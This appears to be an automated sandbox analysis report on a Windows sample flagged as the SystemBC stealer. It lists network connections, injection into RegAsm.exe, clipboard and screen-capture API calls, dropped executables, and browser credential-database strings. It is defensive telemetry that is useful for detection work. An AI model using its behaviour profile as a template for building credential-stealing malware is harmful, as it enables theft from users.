Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.167.90:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.167.90:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.167.90:443 -> 192.168.2.6:49748 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00439D70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

13_2_00439D70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00439D70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

13_2_00439D70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

3_2_00411F55

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.file.exe.4745570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.file.exe.4745570.2.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects SystemBC Author: ditekSHen

.NET source code contains very large array initializations

Source: GCGHJEBGHJ.exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 360448
Source: 66f75feece638_ldmg[1].exe.3.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 360448

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00419408	3_2_00419408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B610	3_2_0041B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C370	3_2_0041C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61EAD2AC	3_2_61EAD2AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E4B8A1	3_2_61E4B8A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E75F1F	3_2_61E75F1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E40065	3_2_61E40065
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E9E24F	3_2_61E9E24F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E5023C	3_2_61E5023C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E62554	3_2_61E62554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E4E4BF	3_2_61E4E4BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E7A790	3_2_61E7A790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E18736	3_2_61E18736
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E86668	3_2_61E86668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E58670	3_2_61E58670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E10856	3_2_61E10856
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61EA0BA9	3_2_61EA0BA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E62CA3	3_2_61E62CA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E98FE2	3_2_61E98FE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E88FCA	3_2_61E88FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E52F80	3_2_61E52F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61EA2F47	3_2_61EA2F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E56F18	3_2_61E56F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E4CEF9	3_2_61E4CEF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E1EEFF	3_2_61E1EEFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E64E0C	3_2_61E64E0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61EA91F6	3_2_61EA91F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E9316A	3_2_61E9316A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E9F0ED	3_2_61E9F0ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E9D0C3	3_2_61E9D0C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E8D0B6	3_2_61E8D0B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E6904E	3_2_61E6904E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E4304E	3_2_61E4304E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E15337	3_2_61E15337
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E19208	3_2_61E19208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E534E3	3_2_61E534E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E77452	3_2_61E77452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E37930	3_2_61E37930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E7B85E	3_2_61E7B85E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E21816	3_2_61E21816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E9FBF0	3_2_61E9FBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E55BD7	3_2_61E55BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E91DC1	3_2_61E91DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E6DDA5	3_2_61E6DDA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E31DAB	3_2_61E31DAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E95D7A	3_2_61E95D7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E5BC4C	3_2_61E5BC4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E1DEC2	3_2_61E1DEC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E69E8F	3_2_61E69E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61E89E0E	3_2_61E89E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00440118	13_2_00440118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00410A14	13_2_00410A14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00434060	13_2_00434060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00401000	13_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040B010	13_2_0040B010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042F038	13_2_0042F038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00409130	13_2_00409130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00434136	13_2_00434136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0043F1E0	13_2_0043F1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040F242	13_2_0040F242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004492C0	13_2_004492C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00401297	13_2_00401297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00405320	13_2_00405320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040A3F0	13_2_0040A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004073B0	13_2_004073B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00449410	13_2_00449410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040B4B0	13_2_0040B4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00449580	13_2_00449580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00411600	13_2_00411600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042D6F0	13_2_0042D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00449690	13_2_00449690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00448740	13_2_00448740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00408750	13_2_00408750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00403710	13_2_00403710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004407E0	13_2_004407E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00449780	13_2_00449780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041E85A	13_2_0041E85A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042887B	13_2_0042887B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00430810	13_2_00430810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00439880	13_2_00439880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040A940	13_2_0040A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041E900	13_2_0041E900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00449A40	13_2_00449A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00409AC4	13_2_00409AC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00444B60	13_2_00444B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042DB00	13_2_0042DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00439B00	13_2_00439B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041FB39	13_2_0041FB39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042DBD5	13_2_0042DBD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00448C40	13_2_00448C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00428D00	13_2_00428D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00428D1C	13_2_00428D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0044AD20	13_2_0044AD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00429DC9	13_2_00429DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407DB0	13_2_00407DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00437E70	13_2_00437E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042CEC0	13_2_0042CEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00429EE0	13_2_00429EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00410E90	13_2_00410E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040FEA0	13_2_0040FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040BFC0	13_2_0040BFC0

Source: Joe Sandbox View

Dropped File: C:\ProgramData\GCGHJEBGHJ.exe BFC7B367D52504B184D127E385219006C1EFC7E985D608C000E5EB3A204FC779

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CB10 appears 57 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041DBA0 appears 150 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1692

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs file.exe
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs file.exe
Source: file.exe, 00000000.00000002.2168291525.000000000198E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exeD vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.file.exe.4745570.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.file.exe.4745570.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC

Source: GCGHJEBGHJ.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f75feece638_ldmg[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@43/31@5/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

3_2_00411807

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\ProgramData\JKFIDGDHJE.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2740
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 0000001D.00000002.2978749191.0000000019D26000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, KECBGC.3.dr, CGIDAA.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	ReversingLabs: Detection: 42%
Source: file.exe	Virustotal: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
